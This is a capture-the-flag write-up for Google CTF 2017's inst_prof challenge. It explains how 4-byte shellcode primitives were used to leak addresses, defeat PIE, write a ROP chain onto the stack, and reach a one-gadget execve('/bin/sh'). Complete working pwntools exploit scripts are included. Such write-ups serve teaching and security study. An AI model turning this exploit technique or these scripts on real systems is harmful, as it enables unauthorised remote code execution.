This will be a writeup for inst_prof from Google CTF 2017.
Please help test our new compiler micro-service
Challenge running at inst-prof.ctfcompetition.com:1337
I don't know what inst_prof stands for; it might be "instruction profiler". It was a pwn challenge, tricky yet simple. Let's start.
$ file inst_prof
inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped
$ checksec inst_prof
[*] '/home/payatu/Desktop/ctf/googlectf/pwn/inst_prof'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
It's not stripped, and it has Partial RELRO, NX and PIE, with no stack canary.
Reversing
Since the binary is not stripped, reversing it is easy. There are only 2 functions of interest.
int main(int argc, const char **argv, const char **envp)
{
  if ( write(1, "initializing prof...", 0x14uLL) == 20 )
  {
    sleep(5u);
    alarm(0x1Eu);
    if ( write(1, "ready\n", 6uLL) == 6 )
    {
      while ( 1 )
        do_test();
    }
  }
  exit(0);
}

int do_test()
{
  char *new_page;
  unsigned __int64 time1;
  unsigned __int64 time_delta;

  new_page = alloc_page();
  memcpy(new_page, template, sizeof(template));
  read_inst(new_page + 5);          // 4 bytes from stdin overwrite the nops
  make_page_executable(new_page);
  time1 = __rdtsc();
  ((void (__fastcall *)(_DWORD *))new_page)();
  time_delta = __rdtsc() - time1;
  if ( write(1, &time_delta, 8uLL) != 8 )
    exit(0);
  return free_page(new_page);
}
The flow is pretty simple: main calls do_test in an infinite loop. do_test mmap()s a page with PROT_READ|PROT_WRITE and copies a predefined shellcode template into it. The template has 4 nops at offset 5; read_inst reads 4 bytes from stdin and writes them over those nops. The page is then marked executable using mprotect(). Next, do_test uses the rdtsc instruction to read the current time-stamp counter and jumps to the new page. On return it reads the time-stamp counter again and computes the cycles elapsed, which are dumped to stdout.
So we get 4 bytes of our choosing executed by the program 0x1000 times per round (unless we're clever), and from that we have to get RCE.
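To make the layout concrete, here is a minimal Python sketch of the page that do_test effectively builds. The template bytes are an assumption reconstructed from the description above (a 5-byte `mov ecx, 0x1000`, four nops at offset 5, then a decrement-and-loop and a `ret`); the real bytes in the binary may differ, and `build_page` is a hypothetical helper name.

```python
# ASSUMED template, reconstructed from the description, not dumped from the binary:
#   mov ecx, 0x1000 ; nop x4 ; sub ecx, 1 ; jnz <offset 5> ; ret
TEMPLATE = bytes.fromhex("b900100000" "90909090" "83e901" "75f7" "c3")
PATCH_OFFSET = 5   # the four nops start here (per the writeup)
PATCH_SIZE = 4     # read_inst reads exactly 4 bytes

def build_page(user_bytes: bytes) -> bytes:
    """Overlay the 4 user-supplied bytes on the nops, like read_inst(new_page + 5)."""
    if len(user_bytes) != PATCH_SIZE:
        raise ValueError("the service consumes exactly 4 bytes per round")
    page = bytearray(TEMPLATE)
    page[PATCH_OFFSET:PATCH_OFFSET + PATCH_SIZE] = user_bytes
    return bytes(page)

# Example payload: dec r15 ; ret
page = build_page(b"\x49\xff\xcf\xc3")
print(page.hex())
```

With a template shaped like this, a payload that ends in `ret` leaves the page on the first pass, which is presumably the "clever" way to avoid running 0x1000 times.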
Let's now debug in gdb and find out how and what we control.
Just before jumping into the template, here's what the context is.
Some things to notice:
- previous rdtsc is saved in r12
- r13 has an address belonging to the stack
- rsp points to an address in do_test
I also noticed across executions:
- r13, r14 and r15 are preserved between executions; r8 through r12 are not
Hunting for instructions
The 4-byte constraint is hard. pwntools is a great tool that helps with every aspect of exploitation. I used it to check how we can control the r8-r15 registers in 4 bytes or fewer.
>>> from pwn import *
>>> context(arch='amd64', os='linux', log_level='info')
>>> asm("push rsp")
'T'
>>> asm("push r15")
'AW'
>>> asm("pop r15")
'A_'
>>> asm("inc r15")
'I\xff\xc7'
>>> asm("dec r15")
'I\xff\xcf'
Sweet! push and pop can be achieved in 2 bytes, inc and dec in 3 bytes, and ret is just a single byte.
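The byte counts can also be checked without an assembler. Below is a small sketch that hand-encodes these four instructions for any 64-bit general-purpose register, following the standard x86-64 encoding rules (REX prefix, `50+r` / `58+r` for push/pop, `FF /0` and `FF /1` for inc/dec). The helper names are my own, not pwntools APIs.

```python
def _rex(reg: int, wide: bool) -> bytes:
    """REX prefix 0100WR0B: W for 64-bit operand size, B to reach r8-r15."""
    rex = 0x40 | (0x08 if wide else 0) | (0x01 if reg >= 8 else 0)
    return bytes([rex]) if rex != 0x40 else b""

def push_reg(reg: int) -> bytes:
    return _rex(reg, False) + bytes([0x50 + (reg & 7)])

def pop_reg(reg: int) -> bytes:
    return _rex(reg, False) + bytes([0x58 + (reg & 7)])

def inc_reg(reg: int) -> bytes:
    # FF /0 with a register operand: ModRM = 11 000 rrr
    return _rex(reg, True) + bytes([0xFF, 0xC0 | (reg & 7)])

def dec_reg(reg: int) -> bytes:
    # FF /1 with a register operand: ModRM = 11 001 rrr
    return _rex(reg, True) + bytes([0xFF, 0xC8 | (reg & 7)])

RET = b"\xc3"
RSP, R15 = 4, 15   # hardware register numbers

for name, code in [("push rsp", push_reg(RSP)), ("push r15", push_reg(R15)),
                   ("pop r15", pop_reg(R15)), ("inc r15", inc_reg(R15)),
                   ("dec r15", dec_reg(R15)), ("dec r15; ret", dec_reg(R15) + RET)]:
    print("%-14s %-10s %d bytes" % (name, code.hex(), len(code)))
```

This shows why `dec r15; ret` and `pop r15; push r15` both land on exactly 4 bytes, the size of the window we are given.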
The binary has PIE, so the first thing we need is a leak to resolve the base address of the binary.
My first plan was to leak the return address ($rip) saved on the stack just before jumping to the template.
>>> asm("pop r15;push r15")
'A_AW'
This copies the saved return address into r15. We can then inc or dec r15 and jump anywhere in the binary by using push r15; ret.
This gives us the power to jump to any offset in the binary, but the target must return safely so that we don't abruptly end the process.
Craft a leak
There are 2 candidates for a leak:
- offset 0x868 : main+8 will leak 0x14 bytes to stdout
- offset 0x8a2 : main+0x42 will leak 0x6 bytes to stdout
The first one passes through sleep() and alarm() on return, which is not feasible. The second one is a good candidate for the leak.
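Since r15 can only move one byte per round with `dec r15; ret`, it is worth working out how many rounds the walk takes. A quick sketch, using the offset 0xb18 for the saved return address (taken from the loop bound in the exploit script) and a made-up base address for illustration:

```python
RET_ADDR_OFFSET = 0xb18   # saved return address inside do_test (from the exploit's loop bound)
TARGET_OFFSET = 0x8a2     # main+0x42, the 6-byte write

# Each "dec r15; ret" round subtracts exactly one from r15.
steps = RET_ADDR_OFFSET - TARGET_OFFSET

def walk_r15(binary_base: int) -> int:
    """Simulate the repeated decrement starting from the saved return address."""
    r15 = binary_base + RET_ADDR_OFFSET
    for _ in range(steps):
        r15 -= 1
    return r15

example_base = 0x555555554000   # hypothetical PIE base, for illustration only
print("rounds needed:", steps)
print("r15 ends at  :", hex(walk_r15(example_base)))
```

The walk never needs to know the base: it only relies on the distance between two offsets inside the same binary, which PIE does not change.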
So the strategy is to execute the following code to leak a stack address:
- pop r15; push r15 (get the saved return address)
- dec r15; ret (repeated, to decrease it to main+0x42)
- push rbp; pop rsi; push r15 (get [rbp] to leak, which holds a stack address)
This will leak rsp+56.
To leak a saved instruction address:
- pop r15; push r15 (get the saved return address)
- dec r15; ret (repeated, to decrease it to main+0x42)
- push rsp; pop rsi; push r15 (get [rsp] to leak)
This will leak do_test+0x58.
from pwn import *
context(arch='amd64', os='linux', log_level='info')

# Assembling is slow, so cache the bytes for each instruction string.
instruction_cache = {}
def cc_asm(ins):
    if ins not in instruction_cache:
        instruction_cache[ins] = asm(ins)
    return instruction_cache[ins]

# PLT offsets (not used in this first stage)
plt_read = 2016
plt_write = 1964

s = remote('127.0.0.1', 5000)
raw_input()   # pause here so a debugger can be attached
s.recvline()  # "initializing prof...ready"

def execute(ins, get_response=True, count=8):
    s.send(cc_asm(ins))
    if get_response:
        s.recv(count)   # discard the 8-byte rdtsc delta

# Leak a stack address.
execute("pop r15; push r15")
for _ in xrange(0xb18 - 0x8a2):
    execute("dec r15; ret")
execute("push rbp; pop rsi; push r15", get_response=False)
leak_stack = u64(s.recv(6)+"\x00\x00")
print hex(leak_stack)

# Leak an instruction address.
execute("pop r15; push r15")
for _ in xrange(0xb18 - 0x8a2):
    execute("dec r15; ret")
execute("push rsp; pop rsi; push r15", get_response=False)
leak_ip = u64(s.recv(6)+"\x00\x00")
print hex(leak_ip)

s.close()
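The leak only returns 6 bytes, which is why the script pads it with two zero bytes before calling u64. The same step in plain Python 3, as a sketch: `parse_leak` is a hypothetical helper, the example bytes are made up, and subtracting 0x8a2 to get the base mirrors what the final exploit does.

```python
import struct

def parse_leak(raw: bytes) -> int:
    """Zero-extend a short little-endian leak to 64 bits (same idea as padding before u64)."""
    if len(raw) > 8:
        raise ValueError("a qword leak is at most 8 bytes")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]

LEAK_OFFSET = 0x8a2   # offset subtracted by the final exploit

# Made-up 6-byte response, for illustration only.
example_response = bytes.fromhex("a24855555555")
leak = parse_leak(example_response)
binary_base = leak - LEAK_OFFSET

print("leak        :", hex(leak))
print("binary base :", hex(binary_base))
```

Six bytes are enough because user-space addresses on x86-64 Linux normally fit in 48 bits, so the top two bytes are zero. A quick sanity check on a real run is that the computed base is page aligned.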
This helps us defeat PIE by leaking the base of the binary. With that we can write a ROP chain using gadgets from the binary. Since we don't have a syscall gadget, we either have to use ret2libc, or use alloc_page and make_page_executable to jump to shellcode. I spent a lot of time looking for proper gadgets to chain alloc_page, read_n and make_page_executable. The problem was that the return value of alloc_page is in eax, and there were no proper gadgets to copy that value and continue execution.
I have also observed in other CTFs that mmap followed by munmap sometimes returns the same page. I tried to make munmap fail, since we can control ebx during our shellcode execution, but I did not go deeper into this. So the only option left was ret2libc.
Exploit or GTFO!!
There are not many candidates for where to place the ROP chain in memory. One is the .data segment, the other is the stack. As we now have both addresses leaked we could go either way. I chose the stack, as I didn't know how long the ROP chain would be.
To write the chain to the stack we can use the instruction movb [reg], byte, with one of the r8-r15 registers as the pointer.
>>> asm("movb [r15], 0x1")
'A\xc6\x07\x01'
>>> len(asm("movb [r15], 0x1"))
4
>>> len(asm("movb [r14], 0x1"))
4
>>> len(asm("movb [r13], 0x1"))
5
r14 and r15 both keep their values between executions, so this way we can write to an address byte by byte.
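The reason r13 costs an extra byte is an x86-64 encoding quirk: with mod=00, an r/m field of 101 means RIP-relative addressing, so rbp/r13 need an explicit zero displacement (and rsp/r12 need a SIB byte). A sketch that hand-encodes `mov byte ptr [reg], imm8` (opcode `C6 /0`) to show the lengths; the function name is my own.

```python
def mov_byte_to_mem(reg: int, imm: int) -> bytes:
    """Encode `mov byte ptr [reg], imm8` for a 64-bit base register (0 = rax ... 15 = r15)."""
    if not 0 <= reg <= 15 or not 0 <= imm <= 0xFF:
        raise ValueError("register must be 0-15 and the immediate must fit in a byte")
    prefix = b"\x41" if reg >= 8 else b""   # REX.B selects r8-r15
    low = reg & 7
    if low == 4:
        # rsp / r12: r/m=100 means "SIB byte follows"; SIB 0x24 = base only, no index
        addressing = bytes([0x04, 0x24])
    elif low == 5:
        # rbp / r13: mod=00 r/m=101 would mean RIP-relative, so use mod=01 with disp8 = 0
        addressing = bytes([0x45, 0x00])
    else:
        addressing = bytes([low])            # mod=00, reg=/0, r/m=low
    return prefix + b"\xc6" + addressing + bytes([imm])

for number, name in [(12, "r12"), (13, "r13"), (14, "r14"), (15, "r15")]:
    code = mov_byte_to_mem(number, 1)
    print("mov byte ptr [%s], 1 -> %s (%d bytes)" % (name, code.hex(), len(code)))
```

So among the registers that survive between rounds, only r14 and r15 give a 4-byte store.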
The return address for do_test's frame is saved on the stack at rbp+8. Since do_test's frame changes between calls, I wrote the ROP chain just after the return address of do_test; when I want to trigger it, I shrink the stack by 8 bytes using an extra pop.
def write_and_execute_rop(rop):
    execute("push rbp; pop r14; ret")  # copy rbp to r14
    for _ in xrange(16):
        execute("inc r14; ret")  # add 16 to r14 to get out of do_test's frame
    for i in rop:
        execute("movb [r14], %d" % ord(i))  # write one byte
        execute("inc r14; ret")  # move to the next byte
    # do an extra pop and shrink the stack by 8 bytes, thus triggering the written rop chain
    execute("pop rax; pop rbx; push rax; ret")
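To get a feel for the cost of this primitive, here is a sketch that only plans the rounds instead of sending them. The instruction strings are copied from the function above; `plan_rop_write` is a hypothetical helper and does not talk to the service.

```python
def plan_rop_write(rop: bytes, skip: int = 16) -> list:
    """Return the 4-byte instruction strings, one per round, needed to place and trigger `rop`."""
    rounds = ["push rbp; pop r14; ret"]          # r14 = rbp
    rounds += ["inc r14; ret"] * skip            # step past saved rbp and the return address
    for value in rop:
        rounds.append("movb [r14], %d" % value)  # store one byte of the chain
        rounds.append("inc r14; ret")            # advance the write pointer
    rounds.append("pop rax; pop rbx; push rax; ret")  # shift the stack by 8 to trigger
    return rounds

chain = b"\x00" * 56   # a 7-qword chain, e.g. the size used for the GOT leak
plan = plan_rop_write(chain)
print("rounds:", len(plan))
print("first :", plan[0])
print("last  :", plan[-1])
```

Every chain byte costs two round trips, so the number of rounds is 18 + 2 * len(rop). That matters because of the alarm() timeout set in main.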
Now we have an execution primitive. The first thing I do is leak GOT['read'] and return execution to main(). Once we have the leaked GOT value we can use libc-database to find the libc version.
def leak_qword(addr):
    rop = p64(binary_base + pop_rdi)
    rop += p64(1)  # stdout
    rop += p64(binary_base + pop_rsi)
    rop += p64(addr)
    rop += "sudhakar"  # 8 filler bytes consumed by the gadget's pop r15
    rop += p64(binary_base + plt_write)
    rop += p64(binary_base + 0x860)  # back to main
    write_and_execute_rop(rop)
    return u64(s.recv(8))

leak_got_read = leak_qword(binary_base + got_read)
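The stack layout of that chain is easier to see when it is dumped qword by qword. A stdlib-only sketch that mirrors leak_qword; the offsets are the ones listed in the final exploit, while the base and target addresses in the example are made up.

```python
import struct

POP_RDI = 0xbc3       # pop rdi ; ret
POP_RSI_R15 = 0xbc1   # pop rsi ; pop r15 ; ret
PLT_WRITE = 1964      # write@plt
MAIN = 0x860          # main, so the service keeps running after the leak

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

def build_leak_chain(binary_base: int, addr: int) -> bytes:
    """write(1, addr, <whatever rdx holds>) followed by a return to main."""
    return b"".join([
        p64(binary_base + POP_RDI), p64(1),       # rdi = stdout
        p64(binary_base + POP_RSI_R15), p64(addr),  # rsi = address to dump
        b"A" * 8,                                 # filler for the extra pop r15
        p64(binary_base + PLT_WRITE),
        p64(binary_base + MAIN),
    ])

example_base = 0x555555554000            # hypothetical PIE base
chain = build_leak_chain(example_base, example_base + 2105392)
for offset in range(0, len(chain), 8):
    print("+0x%02x  %016x" % (offset, struct.unpack_from("<Q", chain, offset)[0]))
```

Note that the chain never sets rdx, so the length passed to write is whatever rdx happens to contain at that point; the exploit simply reads the first 8 bytes that come back.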
At the time of writing this writeup the service was down (it's up now!), so I wrote the exploit against a local instance. For that:
$ ./find read 220
/lib/x86_64-linux-gnu/libc.so.6 (id local-14c22be9aa11316f89909e4237314e009da38883)
$ ./dump local-14c22be9aa11316f89909e4237314e009da38883
offset___libc_start_main_ret = 0x20830
offset_system = 0x0000000000045390
offset_dup2 = 0x00000000000f7940
offset_read = 0x00000000000f7220
offset_write = 0x00000000000f7280
offset_str_bin_sh = 0x18cd17
This way I could find the offset of any function in libc and calculate its address in memory. The easiest way to get RCE would be to call system("/bin/sh"), as we have the offsets of both system and "/bin/sh" in libc.
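The address arithmetic is just one subtraction and a few additions. A small sketch using the offsets from the dump above and a made-up leaked address; `libc_addresses` is a hypothetical helper.

```python
# Offsets from the libc-database dump above.
OFFSETS = {
    "read": 0xf7220,
    "system": 0x45390,
    "str_bin_sh": 0x18cd17,
}

def libc_addresses(leaked_read: int) -> dict:
    """Derive the libc base from a leaked read() address, then rebase the other symbols."""
    base = leaked_read - OFFSETS["read"]
    if base & 0xfff:
        raise ValueError("base is not page aligned; probably the wrong libc")
    return {
        "base": base,
        "system": base + OFFSETS["system"],
        "bin_sh": base + OFFSETS["str_bin_sh"],
    }

example_leak = 0x7ffff7b04220   # made-up value of GOT['read'], for illustration
addrs = libc_addresses(example_leak)
for name in ("base", "system", "bin_sh"):
    print("%-7s %s" % (name, hex(addrs[name])))
```

The low 12 bits of the leak (0x220 here) survive ASLR, which is exactly what `./find read 220` matches on.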
Another option is to use a one-gadget RCE from libc. Using one-gadget I found these addresses.
$ one_gadget /lib/x86_64-linux-gnu/libc.so.6
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xcd0f3 execve("/bin/sh", rcx, r12)
constraints:
  [rcx] == NULL || rcx == NULL
  [r12] == NULL || r12 == NULL

0xcd1c8 execve("/bin/sh", rax, r12)
constraints:
  [rax] == NULL || rax == NULL
  [r12] == NULL || r12 == NULL

0xf0274 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1117 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

0xf66c0 execve("/bin/sh", rcx, [rbp-0xf8])
constraints:
  [rcx] == NULL || rcx == NULL
  [[rbp-0xf8]] == NULL || [rbp-0xf8] == NULL
The first one seems to be the easiest, with the simplest constraint. So, the final exploit:
from pwn import *
context(arch='amd64', os='linux', log_level='debug')

# Assembling is slow, so cache the bytes for each instruction string.
instruction_cache = {}
def cc_asm(ins):
    if ins not in instruction_cache:
        instruction_cache[ins] = asm(ins)
    return instruction_cache[ins]

plt_read = 2016
plt_write = 1964
got_write = 2105368
got_read = 2105392
pop_rdi = 0x0000000000000bc3  # pop rdi ; ret
pop_rsi = 0x0000000000000bc1  # pop rsi ; pop r15 ; ret
'''
pwndbg> p read
$1 = {<text variable, no debug info>} 0xf7220 <read>
pwndbg> p write
$3 = {<text variable, no debug info>} 0xf7280 <write>
'''
libc_read = 0xf7220
libc_write = 0xf7280

s = remote('inst-prof.ctfcompetition.com', 1337)
s.recvline()

def execute(ins, get_response=True, count=8):
    payload = cc_asm(ins)
    assert(len(payload)<=4)
    s.send(payload)
    if get_response:
        s.recv(count)  # discard the 8-byte rdtsc delta

# Leak a stack address.
execute("pop r15; push r15")
for _ in xrange(0xb18 - 0x8a2):
    execute("dec r15; ret")
execute("push rbp; pop rsi; push r15", get_response=False)
leak_stack = u64(s.recv(6)+"\x00\x00")
# print hex(leak_stack)

# Leak an instruction address and derive the binary base.
execute("pop r15; push r15")
for _ in xrange(0xb18 - 0x8a2):
    execute("dec r15; ret")
execute("push rsp; pop rsi; push r15", get_response=False)
leak_ip = u64(s.recv(6)+"\x00\x00")
# print hex(leak_ip)
binary_base = leak_ip - 0x8a2

# Debug helper: dump a register through the same 6-byte write.
def leak_register(reg):
    execute("pop r15; push r15")
    execute("mov [rbp], {0}".format(reg))
    for _ in xrange(0xb18 - 0x8a2):
        execute("dec r15; ret")
    execute("push rbp; pop rsi; push r15", get_response=False)
    leak_reg = u64(s.recv(6)+"\x00\x00")
    return leak_reg

def write_and_execute_rop(rop):
    execute("push rbp; pop r14; ret")
    # print "r14", hex(leak_register('r14'))
    for _ in xrange(16):
        execute("inc r14; ret")
    for i in rop:
        execute("movb [r14], %d" % ord(i))
        execute("inc r14; ret")
    # print "r14", hex(leak_register('r14'))
    execute("pop rax; pop rbx; push rax; ret")

def leak_qword(addr):
    rop = p64(binary_base + pop_rdi)
    rop += p64(1)  # stdout
    rop += p64(binary_base + pop_rsi)
    rop += p64(addr)
    rop += "sudhakar"  # 8 filler bytes consumed by the gadget's pop r15
    rop += p64(binary_base + plt_write)
    rop += p64(binary_base + 0x860)  # back to main
    write_and_execute_rop(rop)
    return u64(s.recv(8))

leak_got_read = leak_qword(binary_base + got_read)
libc_base = leak_got_read - libc_read
print hex(leak_got_read)

one_gadget_rce = libc_base + 0x4526a
payload = p64(one_gadget_rce)
payload += p64(0)*10  # zeros so that [rsp+0x30] == NULL holds
write_and_execute_rop(payload)

s.interactive()
s.close()
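The ten zero qwords after the gadget address are there to satisfy the one-gadget constraint. A sketch that checks this on the payload layout, assuming that rsp points just past the gadget address once the `ret` into it has executed; the libc base is made up and the helper names are hypothetical.

```python
import struct

ONE_GADGET_OFFSET = 0x4526a   # execve("/bin/sh", rsp+0x30, environ)
CONSTRAINT_OFFSET = 0x30      # [rsp+0x30] == NULL

def build_final_payload(libc_base: int) -> bytes:
    """One gadget address followed by ten zero qwords, as in the final exploit."""
    return struct.pack("<Q", libc_base + ONE_GADGET_OFFSET) + struct.pack("<Q", 0) * 10

def qword_at_rsp(payload: bytes, rsp_offset: int) -> int:
    """Value at [rsp+rsp_offset] right after ret has popped the first qword of the payload."""
    start = 8 + rsp_offset
    if start + 8 > len(payload):
        raise ValueError("the constraint slot lies beyond the payload")
    return struct.unpack_from("<Q", payload, start)[0]

payload = build_final_payload(0x7ffff7a0d000)   # made-up libc base
print("payload length :", len(payload))
print("[rsp+0x30]     :", hex(qword_at_rsp(payload, CONSTRAINT_OFFSET)))
```

With this layout the slot at rsp+0x30 falls on the seventh zero qword, so the padding leaves a little room to spare.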
This gives us a nice shell. w00t!
References:
- pwntools : Awesome framework with a ton of features for exploitation.
- pwndbg : GDB plug-in that makes debugging with GDB suck less, with a focus on features needed by low-level software developers, hardware hackers, reverse-engineers and exploit developers.
- libc-database : libc database, you can add your own libc’s too.
- one-gadget : A tool to find one gadget RCE in libc.